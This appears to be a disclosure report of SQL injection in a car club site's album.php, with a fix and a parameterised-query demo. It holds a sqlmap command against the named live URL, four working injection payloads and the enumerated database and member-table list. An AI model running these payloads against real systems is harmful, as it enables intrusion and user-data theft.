2015-11-18: Details reported to the vendor; awaiting vendor response
2015-11-20: Vendor confirmed the report; details disclosed to the vendor only
2015-11-24: Vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public
sqlmap -u "http://club.zznissan.com.cn/fenbu/album.php?cls=1'%22&keyword=&page=2" --dbms=mysql --tamper=between --level=5 --risk=3
Injectable parameter: cls
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cls
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2

    Type: UNION query
    Title: MySQL UNION query (random number) - 11 columns
    Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'paladinclub'
current user: 'paladinclub@localhost'
available databases [3]:
[*] information_schema
[*] paladinclub
[*] test
Database: paladinclub
[359 tables]
Database: paladinclub
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| memberawoke                  | 2997714 |
| oneq_missiondata             | 1822433 |
| memberpay                    | 174554  |
| membermodify                 | 139384  |
| pw_members                   | 100189  |
| pw_usercache                 | 87618   |
| pw_members123                | 74523   |
| pw_memberdata                | 63917   |
| carinfo                      | 55829   |
| memberinfo                   | 51367   |
| pw_ms_messages               | 51267   |
| pw_ms_relations              | 45781   |
| pw_ms_configs                | 39840   |
| pw_merge_posts               | 38559   |
| pw_posts                     | 38559   |
| pw_membersnew                | 38251   |
| pw_members0705               | 38249   |
| east2008_loginrecord         | 36497   |
| east2008_answer              | 32599   |
| pw_msg                       | 28369   |
| pw_msgc                      | 28368   |
| pw_memberinfo                | 26760   |
| pw_adminlog                  | 22134   |
| pw_datanalyse                | 18747   |
| dakar2006                    | 14392   |
| dakar20061                   | 14391   |
| dakar20062                   | 14091   |
| dakar20063                   | 14091   |
| pw_attachs                   | 13050   |
| fankui                       | 12826   |
| pw_member_behavior_statistic | 10677   |
| pw_merge_tmsgs               | 10531   |
| pw_tmsgs                     | 10531   |
| pw_threads                   | 10526   |
| eastgames_notify             | 7550    |
| pw_medal_award               | 6863    |
| memberinfo_t                 | 6236    |
| imagefile                    | 5411    |
| pw_cache_members             | 5315    |
| pw_statistics_daily          | 5180    |
| east2008_user                | 4739    |
| pw_membercredit              | 3737    |
| pw_permission                | 3736    |
| pw_areas                     | 3550    |
| pw_ipstates                  | 3235    |
| pw_school                    | 2428    |
| article                      | 2370    |
| pw_wordfb                    | 2002    |
| pw_ucnotify                  | 1968    |
| pw_weibo_relations           | 1494    |
| pw_filter                    | 1472    |
| pw_tags                      | 1442    |
| pw_weibo_content             | 1141    |
| pw_forumlog                  | 1110    |
| oneq_mission                 | 1105    |
| memberinfo_bak               | 1049    |
| pw_elements                  | 908     |
| membermark                   | 808     |
| pw_ms_replies                | 663     |
| pw_ms_searchs                | 658     |
| lmsj                         | 603     |
| dakar                        | 537     |
| memberinfo1                  | 456     |
| pw_config                    | 379     |
| pw_attention                 | 345     |
| pw_activityfield             | 340     |
| hk_article                   | 315     |
| wqw_city                     | 301     |
| pw_invoke                    | 300     |
| pw_invokepiece               | 246     |
| hk_class                     | 232     |
| imgcategory                  | 232     |
| pw_friends                   | 183     |
| pw_cachedata                 | 145     |
| pw_recycle                   | 142     |
| pw_cache                     | 137     |
| pw_topicfield                | 128     |
| czhd_memberinfo              | 114     |
| pw_medal_log                 | 114     |
| pw_smiles                    | 111     |
| pw_pageinvoke                | 110     |
| pw_hack                      | 99      |
| pw_space                     | 90      |
| xunlianying                  | 85      |
| userfun                      | 70      |
| pw_diary                     | 69      |
| pw_poststopped               | 67      |
| pw_clientorder               | 65      |
| pw_cnphoto                   | 54      |
| category                     | 52      |
| pw_ouserdata                 | 51      |
| pw_medal_apply               | 48      |
| pw_nav                       | 46      |
| user_bak                     | 41      |
| huikan                       | 36      |
| pw_administrators            | 36      |
| pw_report                    | 36      |
| `user`                       | 34      |
| pw_draft                     | 34      |
| pw_tagdata                   | 33      |
| prov                         | 31      |
| pw_advert                    | 31      |
| pw_collection                | 31      |
| wqw_prov                     | 31      |
| pw_pcfield                   | 30      |
| pw_company                   | 28      |
| pw_user_career               | 28      |
| pw_block                     | 27      |
| pw_help                      | 27      |
| clubinfo                     | 26      |
| pw_cnalbum                   | 23      |
| pw_membertags_relations      | 23      |
| pw_pinglog                   | 23      |
| east2008_question            | 22      |
| pw_rateconfig                | 22      |
| pw_write_smiles              | 22      |
| pw_forumdata                 | 21      |
| pw_forums                    | 21      |
| pw_modehot                   | 21      |
| pw_tpl                       | 19      |
| file_flow                    | 18      |
| pw_medal_info                | 18      |
| pw_usergroups                | 18      |
| khly_hz                      | 17      |
| pw_activitymodel             | 17      |
| pw_membertags                | 17      |
| pw_topictype                 | 16      |
| pw_voter                     | 16      |
| pw_searchforum               | 15      |
| pw_user_education            | 15      |
| file_info                    | 14      |
| east2008pho_loginrecord      | 13      |
| pw_favors                    | 13      |
| pw_forumsextra               | 13      |
| xly_user                     | 13      |
| pw_tools                     | 12      |
| pw_customfield               | 11      |
| pw_medalslogs                | 11      |
| pw_job                       | 10      |
| pw_medalinfo                 | 10      |
| pw_overprint                 | 10      |
| paladin_awards               | 9       |
| pw_home                      | 9       |
| usergroup                    | 9       |
| pw_plan                      | 8       |
| pw_styles                    | 8       |
| pw_topicmodel                | 8       |
| pw_cnskin                    | 7       |
| pw_debateclass               | 7       |
| pw_stopicblock               | 7       |
| pw_cnlevel                   | 6       |
| pw_medaluser                 | 6       |
| pw_polls                     | 6       |
| pw_stamp                     | 6       |
| pw_tpltype                   | 6       |
| cj_jl                        | 5       |
| pw_actions                   | 5       |
| pw_banuser                   | 5       |
| pw_datastore                 | 5       |
| pw_stopiccategory            | 5       |
| pw_topiccate                 | 5       |
| a_user                       | 4       |
| file_share                   | 4       |
| pw_activitycate              | 4       |
| pw_adminset                  | 4       |
| pw_cnclass                   | 3       |
| pw_cnstyles                  | 3       |
| pw_kmd_spread                | 3       |
| topic                        | 3       |
| a_customers                  | 2       |
| a_floor                      | 2       |
| dakar_config                 | 2       |
| east2008pho_user             | 2       |
| pw_channel                   | 2       |
| pw_comment                   | 2       |
| pw_diarytype                 | 2       |
| pw_forumtype                 | 2       |
| pw_modules                   | 2       |
| pw_portalpage                | 2       |
| pw_searchstatistic           | 2       |
| pw_sharelinkstype            | 2       |
| `language`                   | 1       |
| pw_activity                  | 1       |
| pw_actmember                 | 1       |
| pw_bbsinfo                   | 1       |
| pw_cmembers                  | 1       |
| pw_colonys                   | 1       |
| pw_credits                   | 1       |
| pw_filter_class              | 1       |
| pw_friendtype                | 1       |
| pw_invitecode                | 1       |
| pw_mpageconfig               | 1       |
| pw_oboard                    | 1       |
| pw_pidtmp                    | 1       |
| pw_postcate                  | 1       |
| pw_task                      | 1       |
| pw_toollog                   | 1       |
+------------------------------+---------+
Fix: filter the parameter. The URL uses cls=1, so an integer allow-list on cls is a reasonable first check, but the reliable fix is to pass cls to the query as a bound parameter instead of concatenating it into the SQL string; all four techniques sqlmap found (boolean, error, UNION, time-based) depend on the value being parsed as SQL.
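To make the finding and the fix concrete, the following is an added example, not code from the report or from the club.zznissan.com.cn site. It uses SQLite as a stand-in for the MySQL backend, constructs a small album table (the real album.php schema and column names are not known and are assumed here), and runs the boolean-based blind payload sqlmap reported for cls against a concatenated query and against a parameterised one. The true/false pair of payloads is the check sqlmap's boolean-based blind detection performs: a vulnerable query answers the two differently.

```python
import sqlite3

# Constructed stand-in for the album lookup behind album.php?cls=...
# The table name, columns and rows are assumptions for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE album (id INTEGER PRIMARY KEY, cls TEXT, title TEXT);
        INSERT INTO album (cls, title) VALUES
            ('1', 'club outing 2015'),
            ('1', 'track day'),
            ('2', 'members only');
    """)
    return conn

# The boolean-based blind payload sqlmap reported for cls, plus a variant
# whose comparison is false. A vulnerable query answers the two differently.
PAYLOAD_TRUE = "-2754' OR (7970=7970) AND 'ABtb'='ABtb"
PAYLOAD_FALSE = "-2754' OR (7970=7971) AND 'ABtb'='ABtb"


def vulnerable_lookup(conn, cls):
    """String concatenation: the value becomes part of the SQL grammar."""
    sql = "SELECT title FROM album WHERE cls='" + cls + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, cls):
    """Bound parameter: the value is data and is never parsed as SQL."""
    sql = "SELECT title FROM album WHERE cls=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (cls,))]


def is_valid_cls(cls):
    """Allow-list filter matching the report's fix suggestion: cls is an
    integer id in the URL, so reject anything else. Defence in depth on
    top of binding, not a substitute for it."""
    return cls.isdigit() and len(cls) <= 10


def blind_injection_signal(lookup, conn):
    """True when the true and false payloads yield different result sets,
    the behaviour sqlmap's boolean-based blind check looks for."""
    return lookup(conn, PAYLOAD_TRUE) != lookup(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    db = make_db()
    # Concatenated query: the OR payload returns every row, the false
    # variant returns none, so the oracle fires.
    print("vulnerable lookup injectable:", blind_injection_signal(vulnerable_lookup, db))
    # Bound query: both payloads are just strings that match no cls value.
    print("bound lookup injectable:", blind_injection_signal(safe_lookup, db))
    # The allow-list rejects the payload outright.
    print("filter accepts payload:", is_valid_cls(PAYLOAD_TRUE))
```

Run it with no arguments; the concatenated lookup reports injectable, the bound lookup does not, and the allow-list rejects the payload. The UNION, error-based and time-based payloads in the sqlmap output would be defeated by the same binding, since each relies on the quote in cls closing the string literal.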
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-11-20 11:16
Vulnerability received, thank you!
2015-11-24: This deprecated system has been taken offline.
What a coincidence.